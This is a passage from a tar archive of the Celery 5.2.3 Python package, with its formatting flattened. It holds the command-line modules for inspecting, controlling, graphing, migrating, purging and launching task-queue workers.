@click.pass_context @handle_preload_options def status(ctx, timeout, destination, json, **kwargs): """Show list of workers that are online.""" callback = None if json else partial(_say_remote_command_reply, ctx) replies = ctx.obj.app.control.inspect(timeout=timeout, destination=destination, callback=callback).ping() if not replies: raise CeleryCommandException( message='No nodes replied within time constraint', exit_code=EX_UNAVAILABLE ) if json: ctx.obj.echo(dumps(replies)) nodecount = len(replies) if not kwargs.get('quiet', False): ctx.obj.echo('\n{} {} online.'.format( nodecount, text.pluralize(nodecount, 'node'))) @click.command(cls=CeleryCommand, context_settings={'allow_extra_args': True}) @click.argument("action", type=click.Choice([ name for name, info in Panel.meta.items() if info.type == 'inspect' and info.visible ])) @click.option('-t', '--timeout', cls=CeleryOption, type=float, default=1.0, help_group='Remote Control Options', help='Timeout in seconds waiting for reply.') @click.option('-d', '--destination', cls=CeleryOption, type=COMMA_SEPARATED_LIST, help_group='Remote Control Options', help='Comma separated list of destination node names.') @click.option('-j', '--json', cls=CeleryOption, is_flag=True, help_group='Remote Control Options', help='Use json as output format.') @click.pass_context @handle_preload_options def inspect(ctx, action, timeout, destination, json, **kwargs): """Inspect the worker at runtime. Availability: RabbitMQ (AMQP) and Redis transports. 
""" callback = None if json else partial(_say_remote_command_reply, ctx, show_reply=True) arguments = _compile_arguments(action, ctx.args) inspect = ctx.obj.app.control.inspect(timeout=timeout, destination=destination, callback=callback) replies = inspect._request(action, **arguments) if not replies: raise CeleryCommandException( message='No nodes replied within time constraint', exit_code=EX_UNAVAILABLE ) if json: ctx.obj.echo(dumps(replies)) return nodecount = len(replies) if not ctx.obj.quiet: ctx.obj.echo('\n{} {} online.'.format( nodecount, text.pluralize(nodecount, 'node'))) @click.command(cls=CeleryCommand, context_settings={'allow_extra_args': True}) @click.argument("action", type=click.Choice([ name for name, info in Panel.meta.items() if info.type == 'control' and info.visible ])) @click.option('-t', '--timeout', cls=CeleryOption, type=float, default=1.0, help_group='Remote Control Options', help='Timeout in seconds waiting for reply.') @click.option('-d', '--destination', cls=CeleryOption, type=COMMA_SEPARATED_LIST, help_group='Remote Control Options', help='Comma separated list of destination node names.') @click.option('-j', '--json', cls=CeleryOption, is_flag=True, help_group='Remote Control Options', help='Use json as output format.') @click.pass_context @handle_preload_options def control(ctx, action, timeout, destination, json): """Workers remote control. Availability: RabbitMQ (AMQP), Redis, and MongoDB transports. """ callback = None if json else partial(_say_remote_command_reply, ctx, show_reply=True) args = ctx.args arguments = _compile_arguments(action, args) replies = ctx.obj.app.control.broadcast(action, timeout=timeout, destination=destination, callback=callback, reply=True, arguments=arguments) if not replies: raise CeleryCommandException( message='No nodes replied within time constraint', exit_code=EX_UNAVAILABLE ) if json: ctx.obj.echo(dumps(replies)) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/events.py0000664000175000017500000000541100000000000016607 0ustar00asifasif00000000000000"""The ``celery events`` program.""" import sys from functools import partial import click from celery.bin.base import (LOG_LEVEL, CeleryDaemonCommand, CeleryOption, handle_preload_options) from celery.platforms import detached, set_process_title, strargv def _set_process_status(prog, info=''): prog = '{}:{}'.format('celery events', prog) info = f'{info} {strargv(sys.argv)}' return set_process_title(prog, info=info) def _run_evdump(app): from celery.events.dumper import evdump _set_process_status('dump') return evdump(app=app) def _run_evcam(camera, app, logfile=None, pidfile=None, uid=None, gid=None, umask=None, workdir=None, detach=False, **kwargs): from celery.events.snapshot import evcam _set_process_status('cam') kwargs['app'] = app cam = partial(evcam, camera, logfile=logfile, pidfile=pidfile, **kwargs) if detach: with detached(logfile, pidfile, uid, gid, umask, workdir): return cam() else: return cam() def _run_evtop(app): try: from celery.events.cursesmon import evtop _set_process_status('top') return evtop(app=app) except ModuleNotFoundError as e: if e.name == '_curses': # TODO: Improve this error message raise click.UsageError("The curses module is required for this command.") @click.command(cls=CeleryDaemonCommand) @click.option('-d', '--dump', cls=CeleryOption, is_flag=True, help_group='Dumper') @click.option('-c', '--camera', cls=CeleryOption, help_group='Snapshot') @click.option('-d', 
'--detach', cls=CeleryOption, is_flag=True, help_group='Snapshot') @click.option('-F', '--frequency', '--freq', type=float, default=1.0, cls=CeleryOption, help_group='Snapshot') @click.option('-r', '--maxrate', cls=CeleryOption, help_group='Snapshot') @click.option('-l', '--loglevel', default='WARNING', cls=CeleryOption, type=LOG_LEVEL, help_group="Snapshot", help="Logging level.") @click.pass_context @handle_preload_options def events(ctx, dump, camera, detach, frequency, maxrate, loglevel, **kwargs): """Event-stream utilities.""" app = ctx.obj.app if dump: return _run_evdump(app) if camera: return _run_evcam(camera, app=app, freq=frequency, maxrate=maxrate, loglevel=loglevel, detach=detach, **kwargs) return _run_evtop(app) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/graph.py0000664000175000017500000001324400000000000016407 0ustar00asifasif00000000000000"""The ``celery graph`` command.""" import sys from operator import itemgetter import click from celery.bin.base import CeleryCommand, handle_preload_options from celery.utils.graph import DependencyGraph, GraphFormatter @click.group() @click.pass_context @handle_preload_options def graph(ctx): """The ``celery graph`` command.""" @graph.command(cls=CeleryCommand, context_settings={'allow_extra_args': True}) @click.pass_context def bootsteps(ctx): """Display bootsteps graph.""" worker = ctx.obj.app.WorkController() include = {arg.lower() for arg in ctx.args or ['worker', 'consumer']} if 'worker' in include: worker_graph = worker.blueprint.graph if 'consumer' in include: worker.blueprint.connect_with(worker.consumer.blueprint) else: worker_graph = worker.consumer.blueprint.graph worker_graph.to_dot(sys.stdout) @graph.command(cls=CeleryCommand, context_settings={'allow_extra_args': True}) @click.pass_context def workers(ctx): """Display workers graph.""" def simplearg(arg): return maybe_list(itemgetter(0, 2)(arg.partition(':'))) def maybe_list(l, sep=','): return l[0], l[1].split(sep) if sep in l[1] else l[1] args = dict(simplearg(arg) for arg in ctx.args) generic = 'generic' in args def generic_label(node): return '{} ({}://)'.format(type(node).__name__, node._label.split('://')[0]) class Node: force_label = None scheme = {} def __init__(self, label, pos=None): self._label = label self.pos = pos def label(self): return self._label def __str__(self): return self.label() class Thread(Node): scheme = { 'fillcolor': 'lightcyan4', 'fontcolor': 'yellow', 'shape': 'oval', 'fontsize': 10, 'width': 0.3, 'color': 'black', } def __init__(self, label, **kwargs): self.real_label = label super().__init__( label=f'thr-{next(tids)}', pos=0, ) class Formatter(GraphFormatter): def label(self, obj): return obj and obj.label() def node(self, obj): scheme = dict(obj.scheme) if obj.pos else obj.scheme if isinstance(obj, Thread): scheme['label'] = obj.real_label return self.draw_node( obj, dict(self.node_scheme, **scheme), ) def terminal_node(self, obj): return self.draw_node( obj, dict(self.term_scheme, **obj.scheme), ) def edge(self, a, b, **attrs): if isinstance(a, Thread): attrs.update(arrowhead='none', arrowtail='tee') return self.draw_edge(a, b, self.edge_scheme, attrs) def subscript(n): S = {'0': '₀', '1': '₁', '2': '₂', '3': '₃', '4': '₄', '5': '₅', '6': '₆', '7': '₇', '8': '₈', '9': '₉'} return ''.join([S[i] for i in str(n)]) class Worker(Node): pass class Backend(Node): scheme = { 'shape': 'folder', 'width': 2, 'height': 1, 'color': 'black', 'fillcolor': 'peachpuff3', 
} def label(self): return generic_label(self) if generic else self._label class Broker(Node): scheme = { 'shape': 'circle', 'fillcolor': 'cadetblue3', 'color': 'cadetblue4', 'height': 1, } def label(self): return generic_label(self) if generic else self._label from itertools import count tids = count(1) Wmax = int(args.get('wmax', 4) or 0) Tmax = int(args.get('tmax', 3) or 0) def maybe_abbr(l, name, max=Wmax): size = len(l) abbr = max and size > max if 'enumerate' in args: l = [f'{name}{subscript(i + 1)}' for i, obj in enumerate(l)] if abbr: l = l[0:max - 1] + [l[size - 1]] l[max - 2] = '{}⎨…{}⎬'.format( name[0], subscript(size - (max - 1))) return l app = ctx.obj.app try: workers = args['nodes'] threads = args.get('threads') or [] except KeyError: replies = app.control.inspect().stats() or {} workers, threads = [], [] for worker, reply in replies.items(): workers.append(worker) threads.append(reply['pool']['max-concurrency']) wlen = len(workers) backend = args.get('backend', app.conf.result_backend) threads_for = {} workers = maybe_abbr(workers, 'Worker') if Wmax and wlen > Wmax: threads = threads[0:3] + [threads[-1]] for i, threads in enumerate(threads): threads_for[workers[i]] = maybe_abbr( list(range(int(threads))), 'P', Tmax, ) broker = Broker(args.get( 'broker', app.connection_for_read().as_uri())) backend = Backend(backend) if backend else None deps = DependencyGraph(formatter=Formatter()) deps.add_arc(broker) if backend: deps.add_arc(backend) curworker = [0] for i, worker in enumerate(workers): worker = Worker(worker, pos=i) deps.add_arc(worker) deps.add_edge(worker, broker) if backend: deps.add_edge(worker, backend) threads = threads_for.get(worker._label) if threads: for thread in threads: thread = Thread(thread) deps.add_arc(thread) deps.add_edge(thread, worker) curworker[0] += 1 deps.to_dot(sys.stdout) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/list.py0000664000175000017500000000204200000000000016253 0ustar00asifasif00000000000000"""The ``celery list bindings`` command, used to inspect queue bindings.""" import click from celery.bin.base import CeleryCommand, handle_preload_options @click.group(name="list") @click.pass_context @handle_preload_options def list_(ctx): """Get info from broker. Note: For RabbitMQ the management plugin is required. """ @list_.command(cls=CeleryCommand) @click.pass_context def bindings(ctx): """Inspect queue bindings.""" # TODO: Consider using a table formatter for this command. 
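# The body below declares the app's task queues on a fresh connection, asks
# the transport's management interface for the current bindings, and prints
# them as three fixed-width columns; transports without a management
# interface raise NotImplementedError, which is reported as a UsageError.
# Illustrative sample row (hypothetical values, default 'celery' queue):
#     celery                       celery                       celery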
app = ctx.obj.app with app.connection() as conn: app.amqp.TaskConsumer(conn).declare() try: bindings = conn.manager.get_bindings() except NotImplementedError: raise click.UsageError('Your transport cannot list bindings.') def fmt(q, e, r): ctx.obj.echo(f'{q:<28} {e:<28} {r}') fmt('Queue', 'Exchange', 'Routing Key') fmt('-' * 16, '-' * 16, '-' * 16) for b in bindings: fmt(b['destination'], b['source'], b['routing_key']) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/logtool.py0000664000175000017500000001025300000000000016762 0ustar00asifasif00000000000000"""The ``celery logtool`` command.""" import re from collections import Counter from fileinput import FileInput import click from celery.bin.base import CeleryCommand, handle_preload_options __all__ = ('logtool',) RE_LOG_START = re.compile(r'^\[\d\d\d\d\-\d\d-\d\d ') RE_TASK_RECEIVED = re.compile(r'.+?\] Received') RE_TASK_READY = re.compile(r'.+?\] Task') RE_TASK_INFO = re.compile(r'.+?([\w\.]+)\[(.+?)\].+') RE_TASK_RESULT = re.compile(r'.+?[\w\.]+\[.+?\] (.+)') REPORT_FORMAT = """ Report ====== Task total: {task[total]} Task errors: {task[errors]} Task success: {task[succeeded]} Task completed: {task[completed]} Tasks ===== {task[types].format} """ class _task_counts(list): @property def format(self): return '\n'.join('{}: {}'.format(*i) for i in self) def task_info(line): m = RE_TASK_INFO.match(line) return m.groups() class Audit: def __init__(self, on_task_error=None, on_trace=None, on_debug=None): self.ids = set() self.names = {} self.results = {} self.ready = set() self.task_types = Counter() self.task_errors = 0 self.on_task_error = on_task_error self.on_trace = on_trace self.on_debug = on_debug self.prev_line = None def run(self, files): for line in FileInput(files): self.feed(line) return self def task_received(self, line, task_name, task_id): self.names[task_id] = task_name self.ids.add(task_id) self.task_types[task_name] += 1 def task_ready(self, line, task_name, task_id, result): self.ready.add(task_id) self.results[task_id] = result if 'succeeded' not in result: self.task_error(line, task_name, task_id, result) def task_error(self, line, task_name, task_id, result): self.task_errors += 1 if self.on_task_error: self.on_task_error(line, task_name, task_id, result) def feed(self, line): if RE_LOG_START.match(line): if RE_TASK_RECEIVED.match(line): task_name, task_id = task_info(line) self.task_received(line, task_name, task_id) elif RE_TASK_READY.match(line): task_name, task_id = task_info(line) result = RE_TASK_RESULT.match(line) if result: result, = result.groups() self.task_ready(line, task_name, task_id, result) else: if self.on_debug: self.on_debug(line) self.prev_line = line else: if self.on_trace: self.on_trace('\n'.join(filter(None, [self.prev_line, line]))) self.prev_line = None def incomplete_tasks(self): return self.ids ^ self.ready def report(self): return { 'task': { 'types': _task_counts(self.task_types.most_common()), 'total': len(self.ids), 'errors': self.task_errors, 'completed': len(self.ready), 'succeeded': len(self.ready) - self.task_errors, } } @click.group() @click.pass_context @handle_preload_options def logtool(ctx): """The ``celery logtool`` command.""" @logtool.command(cls=CeleryCommand) @click.argument('files', nargs=-1) @click.pass_context def stats(ctx, files): ctx.obj.echo(REPORT_FORMAT.format( **Audit().run(files).report() )) @logtool.command(cls=CeleryCommand) @click.argument('files', nargs=-1) @click.pass_context 
def traces(ctx, files): Audit(on_trace=ctx.obj.echo).run(files) @logtool.command(cls=CeleryCommand) @click.argument('files', nargs=-1) @click.pass_context def errors(ctx, files): Audit(on_task_error=lambda line, *_: ctx.obj.echo(line)).run(files) @logtool.command(cls=CeleryCommand) @click.argument('files', nargs=-1) @click.pass_context def incomplete(ctx, files): audit = Audit() audit.run(files) for task_id in audit.incomplete_tasks(): ctx.obj.echo(f'Did not complete: {task_id}') @logtool.command(cls=CeleryCommand) @click.argument('files', nargs=-1) @click.pass_context def debug(ctx, files): Audit(on_debug=ctx.obj.echo).run(files) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/migrate.py0000664000175000017500000000413300000000000016733 0ustar00asifasif00000000000000"""The ``celery migrate`` command, used to filter and move messages.""" import click from kombu import Connection from celery.bin.base import (CeleryCommand, CeleryOption, handle_preload_options) from celery.contrib.migrate import migrate_tasks @click.command(cls=CeleryCommand) @click.argument('source') @click.argument('destination') @click.option('-n', '--limit', cls=CeleryOption, type=int, help_group='Migration Options', help='Number of tasks to consume.') @click.option('-t', '--timeout', cls=CeleryOption, type=float, help_group='Migration Options', help='Timeout in seconds waiting for tasks.') @click.option('-a', '--ack-messages', cls=CeleryOption, is_flag=True, help_group='Migration Options', help='Ack messages from source broker.') @click.option('-T', '--tasks', cls=CeleryOption, help_group='Migration Options', help='List of task names to filter on.') @click.option('-Q', '--queues', cls=CeleryOption, help_group='Migration Options', help='List of queues to migrate.') @click.option('-F', '--forever', cls=CeleryOption, is_flag=True, help_group='Migration Options', help='Continually migrate tasks until killed.') @click.pass_context @handle_preload_options def migrate(ctx, source, destination, **kwargs): """Migrate tasks from one broker to another. Warning: This command is experimental, make sure you have a backup of the tasks before you continue. """ # TODO: Use a progress bar def on_migrate_task(state, body, message): ctx.obj.echo(f"Migrating task {state.count}/{state.strtotal}: {body}") migrate_tasks(Connection(source), Connection(destination), callback=on_migrate_task, **kwargs) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/multi.py0000664000175000017500000003600400000000000016437 0ustar00asifasif00000000000000"""Start multiple worker instances from the command-line. .. program:: celery multi Examples ======== .. code-block:: console $ # Single worker with explicit name and events enabled. $ celery multi start Leslie -E $ # Pidfiles and logfiles are stored in the current directory $ # by default. Use --pidfile and --logfile argument to change $ # this. The abbreviation %n will be expanded to the current $ # node name. $ celery multi start Leslie -E --pidfile=/var/run/celery/%n.pid --logfile=/var/log/celery/%n%I.log $ # You need to add the same arguments when you restart, $ # as these aren't persisted anywhere. $ celery multi restart Leslie -E --pidfile=/var/run/celery/%n.pid --logfile=/var/log/celery/%n%I.log $ # To stop the node, you need to specify the same pidfile. 
$ celery multi stop Leslie --pidfile=/var/run/celery/%n.pid $ # 3 workers, with 3 processes each $ celery multi start 3 -c 3 celery worker -n celery1@myhost -c 3 celery worker -n celery2@myhost -c 3 celery worker -n celery3@myhost -c 3 $ # override name prefix when using range $ celery multi start 3 --range-prefix=worker -c 3 celery worker -n worker1@myhost -c 3 celery worker -n worker2@myhost -c 3 celery worker -n worker3@myhost -c 3 $ # start 3 named workers $ celery multi start image video data -c 3 celery worker -n image@myhost -c 3 celery worker -n video@myhost -c 3 celery worker -n data@myhost -c 3 $ # specify custom hostname $ celery multi start 2 --hostname=worker.example.com -c 3 celery worker -n celery1@worker.example.com -c 3 celery worker -n celery2@worker.example.com -c 3 $ # specify fully qualified nodenames $ celery multi start foo@worker.example.com bar@worker.example.com -c 3 $ # fully qualified nodenames but using the current hostname $ celery multi start foo@%h bar@%h $ # Advanced example starting 10 workers in the background: $ # * Three of the workers processes the images and video queue $ # * Two of the workers processes the data queue with loglevel DEBUG $ # * the rest processes the default' queue. $ celery multi start 10 -l INFO -Q:1-3 images,video -Q:4,5 data -Q default -L:4,5 DEBUG $ # You can show the commands necessary to start the workers with $ # the 'show' command: $ celery multi show 10 -l INFO -Q:1-3 images,video -Q:4,5 data -Q default -L:4,5 DEBUG $ # Additional options are added to each celery worker's command, $ # but you can also modify the options for ranges of, or specific workers $ # 3 workers: Two with 3 processes, and one with 10 processes. $ celery multi start 3 -c 3 -c:1 10 celery worker -n celery1@myhost -c 10 celery worker -n celery2@myhost -c 3 celery worker -n celery3@myhost -c 3 $ # can also specify options for named workers $ celery multi start image video data -c 3 -c:image 10 celery worker -n image@myhost -c 10 celery worker -n video@myhost -c 3 celery worker -n data@myhost -c 3 $ # ranges and lists of workers in options is also allowed: $ # (-c:1-3 can also be written as -c:1,2,3) $ celery multi start 5 -c 3 -c:1-3 10 celery worker -n celery1@myhost -c 10 celery worker -n celery2@myhost -c 10 celery worker -n celery3@myhost -c 10 celery worker -n celery4@myhost -c 3 celery worker -n celery5@myhost -c 3 $ # lists also works with named workers $ celery multi start foo bar baz xuzzy -c 3 -c:foo,bar,baz 10 celery worker -n foo@myhost -c 10 celery worker -n bar@myhost -c 10 celery worker -n baz@myhost -c 10 celery worker -n xuzzy@myhost -c 3 """ import os import signal import sys from functools import wraps import click from kombu.utils.objects import cached_property from celery import VERSION_BANNER from celery.apps.multi import Cluster, MultiParser, NamespacedOptionParser from celery.bin.base import CeleryCommand, handle_preload_options from celery.platforms import EX_FAILURE, EX_OK, signals from celery.utils import term from celery.utils.text import pluralize __all__ = ('MultiTool',) USAGE = """\ usage: {prog_name} start [worker options] {prog_name} stop [-SIG (default: -TERM)] {prog_name} restart [-SIG] [worker options] {prog_name} kill {prog_name} show [worker options] {prog_name} get hostname [-qv] [worker options] {prog_name} names {prog_name} expand template {prog_name} help additional options (must appear after command name): * --nosplash: Don't display program info. * --quiet: Don't show as much output. 
* --verbose: Show more output. * --no-color: Don't display colors. """ def main(): sys.exit(MultiTool().execute_from_commandline(sys.argv)) def splash(fun): @wraps(fun) def _inner(self, *args, **kwargs): self.splash() return fun(self, *args, **kwargs) return _inner def using_cluster(fun): @wraps(fun) def _inner(self, *argv, **kwargs): return fun(self, self.cluster_from_argv(argv), **kwargs) return _inner def using_cluster_and_sig(fun): @wraps(fun) def _inner(self, *argv, **kwargs): p, cluster = self._cluster_from_argv(argv) sig = self._find_sig_argument(p) return fun(self, cluster, sig, **kwargs) return _inner class TermLogger: splash_text = 'celery multi v{version}' splash_context = {'version': VERSION_BANNER} #: Final exit code. retcode = 0 def setup_terminal(self, stdout, stderr, nosplash=False, quiet=False, verbose=False, no_color=False, **kwargs): self.stdout = stdout or sys.stdout self.stderr = stderr or sys.stderr self.nosplash = nosplash self.quiet = quiet self.verbose = verbose self.no_color = no_color def ok(self, m, newline=True, file=None): self.say(m, newline=newline, file=file) return EX_OK def say(self, m, newline=True, file=None): print(m, file=file or self.stdout, end='\n' if newline else '') def carp(self, m, newline=True, file=None): return self.say(m, newline, file or self.stderr) def error(self, msg=None): if msg: self.carp(msg) self.usage() return EX_FAILURE def info(self, msg, newline=True): if self.verbose: self.note(msg, newline=newline) def note(self, msg, newline=True): if not self.quiet: self.say(str(msg), newline=newline) @splash def usage(self): self.say(USAGE.format(prog_name=self.prog_name)) def splash(self): if not self.nosplash: self.note(self.colored.cyan( self.splash_text.format(**self.splash_context))) @cached_property def colored(self): return term.colored(enabled=not self.no_color) class MultiTool(TermLogger): """The ``celery multi`` program.""" MultiParser = MultiParser OptionParser = NamespacedOptionParser reserved_options = [ ('--nosplash', 'nosplash'), ('--quiet', 'quiet'), ('-q', 'quiet'), ('--verbose', 'verbose'), ('--no-color', 'no_color'), ] def __init__(self, env=None, cmd=None, fh=None, stdout=None, stderr=None, **kwargs): # fh is an old alias to stdout. self.env = env self.cmd = cmd self.setup_terminal(stdout or fh, stderr, **kwargs) self.fh = self.stdout self.prog_name = 'celery multi' self.commands = { 'start': self.start, 'show': self.show, 'stop': self.stop, 'stopwait': self.stopwait, 'stop_verify': self.stopwait, # compat alias 'restart': self.restart, 'kill': self.kill, 'names': self.names, 'expand': self.expand, 'get': self.get, 'help': self.help, } def execute_from_commandline(self, argv, cmd=None): # Reserve the --nosplash|--quiet|-q/--verbose options. argv = self._handle_reserved_options(argv) self.cmd = cmd if cmd is not None else self.cmd self.prog_name = os.path.basename(argv.pop(0)) if not self.validate_arguments(argv): return self.error() return self.call_command(argv[0], argv[1:]) def validate_arguments(self, argv): return argv and argv[0][0] != '-' def call_command(self, command, argv): try: return self.commands[command](*argv) or EX_OK except KeyError: return self.error(f'Invalid command: {command}') def _handle_reserved_options(self, argv): argv = list(argv) # don't modify callers argv. 
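# The loop below strips the multi-specific flags (--nosplash, --quiet/-q,
# --verbose, --no-color) out of argv and records them as attributes, so they
# aren't forwarded to the per-node worker command lines. For example, passing
# --quiet anywhere on the command line sets self.quiet = True and removes the
# flag before the remaining arguments are parsed into nodes.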
for arg, attr in self.reserved_options: if arg in argv: setattr(self, attr, bool(argv.pop(argv.index(arg)))) return argv @splash @using_cluster def start(self, cluster): self.note('> Starting nodes...') return int(any(cluster.start())) @splash @using_cluster_and_sig def stop(self, cluster, sig, **kwargs): return cluster.stop(sig=sig, **kwargs) @splash @using_cluster_and_sig def stopwait(self, cluster, sig, **kwargs): return cluster.stopwait(sig=sig, **kwargs) stop_verify = stopwait # compat @splash @using_cluster_and_sig def restart(self, cluster, sig, **kwargs): return int(any(cluster.restart(sig=sig, **kwargs))) @using_cluster def names(self, cluster): self.say('\n'.join(n.name for n in cluster)) def get(self, wanted, *argv): try: node = self.cluster_from_argv(argv).find(wanted) except KeyError: return EX_FAILURE else: return self.ok(' '.join(node.argv)) @using_cluster def show(self, cluster): return self.ok('\n'.join( ' '.join(node.argv_with_executable) for node in cluster )) @splash @using_cluster def kill(self, cluster): return cluster.kill() def expand(self, template, *argv): return self.ok('\n'.join( node.expander(template) for node in self.cluster_from_argv(argv) )) def help(self, *argv): self.say(__doc__) def _find_sig_argument(self, p, default=signal.SIGTERM): args = p.args[len(p.values):] for arg in reversed(args): if len(arg) == 2 and arg[0] == '-': try: return int(arg[1]) except ValueError: pass if arg[0] == '-': try: return signals.signum(arg[1:]) except (AttributeError, TypeError): pass return default def _nodes_from_argv(self, argv, cmd=None): cmd = cmd if cmd is not None else self.cmd p = self.OptionParser(argv) p.parse() return p, self.MultiParser(cmd=cmd).parse(p) def cluster_from_argv(self, argv, cmd=None): _, cluster = self._cluster_from_argv(argv, cmd=cmd) return cluster def _cluster_from_argv(self, argv, cmd=None): p, nodes = self._nodes_from_argv(argv, cmd=cmd) return p, self.Cluster(list(nodes), cmd=cmd) def Cluster(self, nodes, cmd=None): return Cluster( nodes, cmd=cmd, env=self.env, on_stopping_preamble=self.on_stopping_preamble, on_send_signal=self.on_send_signal, on_still_waiting_for=self.on_still_waiting_for, on_still_waiting_progress=self.on_still_waiting_progress, on_still_waiting_end=self.on_still_waiting_end, on_node_start=self.on_node_start, on_node_restart=self.on_node_restart, on_node_shutdown_ok=self.on_node_shutdown_ok, on_node_status=self.on_node_status, on_node_signal_dead=self.on_node_signal_dead, on_node_signal=self.on_node_signal, on_node_down=self.on_node_down, on_child_spawn=self.on_child_spawn, on_child_signalled=self.on_child_signalled, on_child_failure=self.on_child_failure, ) def on_stopping_preamble(self, nodes): self.note(self.colored.blue('> Stopping nodes...')) def on_send_signal(self, node, sig): self.note('\t> {0.name}: {1} -> {0.pid}'.format(node, sig)) def on_still_waiting_for(self, nodes): num_left = len(nodes) if num_left: self.note(self.colored.blue( '> Waiting for {} {} -> {}...'.format( num_left, pluralize(num_left, 'node'), ', '.join(str(node.pid) for node in nodes)), ), newline=False) def on_still_waiting_progress(self, nodes): self.note('.', newline=False) def on_still_waiting_end(self): self.note('') def on_node_signal_dead(self, node): self.note( 'Could not signal {0.name} ({0.pid}): No such process'.format( node)) def on_node_start(self, node): self.note(f'\t> {node.name}: ', newline=False) def on_node_restart(self, node): self.note(self.colored.blue( f'> Restarting node {node.name}: '), newline=False) def 
on_node_down(self, node): self.note(f'> {node.name}: {self.DOWN}') def on_node_shutdown_ok(self, node): self.note(f'\n\t> {node.name}: {self.OK}') def on_node_status(self, node, retval): self.note(retval and self.FAILED or self.OK) def on_node_signal(self, node, sig): self.note('Sending {sig} to node {0.name} ({0.pid})'.format( node, sig=sig)) def on_child_spawn(self, node, argstr, env): self.info(f' {argstr}') def on_child_signalled(self, node, signum): self.note(f'* Child was terminated by signal {signum}') def on_child_failure(self, node, retcode): self.note(f'* Child terminated with exit code {retcode}') @cached_property def OK(self): return str(self.colored.green('OK')) @cached_property def FAILED(self): return str(self.colored.red('FAILED')) @cached_property def DOWN(self): return str(self.colored.magenta('DOWN')) @click.command( cls=CeleryCommand, context_settings={ 'allow_extra_args': True, 'ignore_unknown_options': True } ) @click.pass_context @handle_preload_options def multi(ctx): """Start multiple worker instances.""" cmd = MultiTool(quiet=ctx.obj.quiet, no_color=ctx.obj.no_color) # In 4.x, celery multi ignores the global --app option. # Since in 5.0 the --app option is global only we # rearrange the arguments so that the MultiTool will parse them correctly. args = sys.argv[1:] args = args[args.index('multi'):] + args[:args.index('multi')] return cmd.execute_from_commandline(args) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/purge.py0000664000175000017500000000502200000000000016423 0ustar00asifasif00000000000000"""The ``celery purge`` program, used to delete messages from queues.""" import click from celery.bin.base import (COMMA_SEPARATED_LIST, CeleryCommand, CeleryOption, handle_preload_options) from celery.utils import text @click.command(cls=CeleryCommand) @click.option('-f', '--force', cls=CeleryOption, is_flag=True, help_group='Purging Options', help="Don't prompt for verification.") @click.option('-Q', '--queues', cls=CeleryOption, type=COMMA_SEPARATED_LIST, help_group='Purging Options', help="Comma separated list of queue names to purge.") @click.option('-X', '--exclude-queues', cls=CeleryOption, type=COMMA_SEPARATED_LIST, help_group='Purging Options', help="Comma separated list of queues names not to purge.") @click.pass_context @handle_preload_options def purge(ctx, force, queues, exclude_queues): """Erase all messages from all known task queues. Warning: There's no undo operation for this command. 
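Example (illustrative only; ``proj``, ``celery`` and ``hipri`` are
hypothetical app and queue names):

    celery -A proj purge -f -Q celery,hipri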
""" app = ctx.obj.app queues = set(queues or app.amqp.queues.keys()) exclude_queues = set(exclude_queues or []) names = queues - exclude_queues qnum = len(names) if names: queues_headline = text.pluralize(qnum, 'queue') if not force: queue_names = ', '.join(sorted(names)) click.confirm(f"{ctx.obj.style('WARNING', fg='red')}:" "This will remove all tasks from " f"{queues_headline}: {queue_names}.\n" " There is no undo for this operation!\n\n" "(to skip this prompt use the -f option)\n" "Are you sure you want to delete all tasks?", abort=True) def _purge(conn, queue): try: return conn.default_channel.queue_purge(queue) or 0 except conn.channel_errors: return 0 with app.connection_for_write() as conn: messages = sum(_purge(conn, queue) for queue in names) if messages: messages_headline = text.pluralize(messages, 'message') ctx.obj.echo(f"Purged {messages} {messages_headline} from " f"{qnum} known task {queues_headline}.") else: ctx.obj.echo(f"No messages purged from {qnum} {queues_headline}.") ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/result.py0000664000175000017500000000175700000000000016632 0ustar00asifasif00000000000000"""The ``celery result`` program, used to inspect task results.""" import click from celery.bin.base import (CeleryCommand, CeleryOption, handle_preload_options) @click.command(cls=CeleryCommand) @click.argument('task_id') @click.option('-t', '--task', cls=CeleryOption, help_group='Result Options', help="Name of task (if custom backend).") @click.option('--traceback', cls=CeleryOption, is_flag=True, help_group='Result Options', help="Show traceback instead.") @click.pass_context @handle_preload_options def result(ctx, task_id, task, traceback): """Print the return value for a given task id.""" app = ctx.obj.app result_cls = app.tasks[task].AsyncResult if task else app.AsyncResult task_result = result_cls(task_id) value = task_result.traceback if traceback else task_result.get() # TODO: Prettify result ctx.obj.echo(value) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/shell.py0000664000175000017500000001131100000000000016406 0ustar00asifasif00000000000000"""The ``celery shell`` program, used to start a REPL.""" import os import sys from importlib import import_module import click from celery.bin.base import (CeleryCommand, CeleryOption, handle_preload_options) def _invoke_fallback_shell(locals): import code try: import readline except ImportError: pass else: import rlcompleter readline.set_completer( rlcompleter.Completer(locals).complete) readline.parse_and_bind('tab:complete') code.interact(local=locals) def _invoke_bpython_shell(locals): import bpython bpython.embed(locals) def _invoke_ipython_shell(locals): for ip in (_ipython, _ipython_pre_10, _ipython_terminal, _ipython_010, _no_ipython): try: return ip(locals) except ImportError: pass def _ipython(locals): from IPython import start_ipython start_ipython(argv=[], user_ns=locals) def _ipython_pre_10(locals): # pragma: no cover from IPython.frontend.terminal.ipapp import TerminalIPythonApp app = TerminalIPythonApp.instance() app.initialize(argv=[]) app.shell.user_ns.update(locals) app.start() def _ipython_terminal(locals): # pragma: no cover from IPython.terminal import embed embed.TerminalInteractiveShell(user_ns=locals).mainloop() def _ipython_010(locals): # pragma: no cover from IPython.Shell import IPShell IPShell(argv=[], 
